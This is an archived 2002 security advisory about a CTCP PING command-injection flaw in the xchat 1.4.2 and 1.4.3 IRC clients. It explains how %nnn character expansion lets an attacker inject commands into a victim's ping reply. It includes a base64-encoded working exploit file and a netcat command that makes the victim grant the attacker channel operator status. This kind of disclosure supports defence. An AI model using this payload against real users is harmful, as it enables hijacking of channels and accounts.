TUCoPS :: Unix :: General
:: unix4984.htm
xchat IRC clients can be tricked by attacker to send commands to server
10th Jan 2002 [SBWID-4984]
COMMAND
xchat IRC clients can be tricked by attacker to send commands to server
SYSTEMS AFFECTED
xchat 1.4.2 and 1.4.3
PROBLEM
zen-parse posted :
The CTCP PING reply handler is designed to return the string that was
sent to it by another client. This enables that client to determine the
time lag between them and another user.
The querying client types
/ping nick
which sends a command of the form:
PRIVMSG nick :\\x01PING 1027050764\\x01\\n
Where \"1027050764\" was some representation of the current time, and
\\x01
is the character with the ASCII value 0x01. The queried client would respond with: NOTICE nick :\\xPING 1027050764\\x01\\n
and the querying client would then compare the current time with the
time in the string.
If you sent \"test 1 2 3 4\" as the time part, xchat would reply with
the same string. The xchat client also has a feature which allows
insertion of arbitrary ascii valued characters into a message. The
message \"This is %065 test.\" gets sent as \"This is A test.\" to the
server. (This option is disabled by default in later versions.)
If these expressions are expanded on the sending client, a ping
messsage could be sent to a user with the command:
/msg nick %001PING 12345678%001
which would send a string like:
PRIVMSG nick :\\x01PING 12345678\\x01
(To disable expansion in xchat when you are typing them, use \'%%nnn\'
to send the \'%nnn\' literal. Eg: to send \'%100x\', type \'%%100x\' in
the client. If your client does expansion, it would show up as \'dx\',
which can be quite annoying when discussing format strings.)
The PING reply handler also expands the %nnn values in replies in the
vulnerable clients. Example exploit, By Marcus Meissner
<Marcus.Meissner@caldera.de>
#fupp is a channel.
Victim is on it and has channel op status.
Enter the command: cat xchat.exploit - | netcat server 6667
(The - is necessary so we do not quit instantely)
This causes vulnerable \'Victim\' to give user \'exploit\' channel operator
status in channel \'#fupp\' on server \'server\'.
---1463783680-382694448-1010569513=:26663
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=\"xchat.exploit\"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0201092245130.26663@clarity.local>
Content-Description:
Content-Disposition: attachment; filename=\"xchat.exploit\"
dXNlciBleHBsb2l0IGZvbyBiYXI6IEV4cGxvaXQgVGVzdGVyDQpuaWNrIEV4
cGxvaXQNCmpvaW4gI2Z1cHANCnByaXZtc2cgVmljdGltIDoBUElORyAxJTAx
ME1PREUgI2Z1cHAgK28gRXhwbG9pdCUwMTABDQoNCg==
---1463783680-382694448-1010569513=:26663--
SOLUTION
Update soon to be available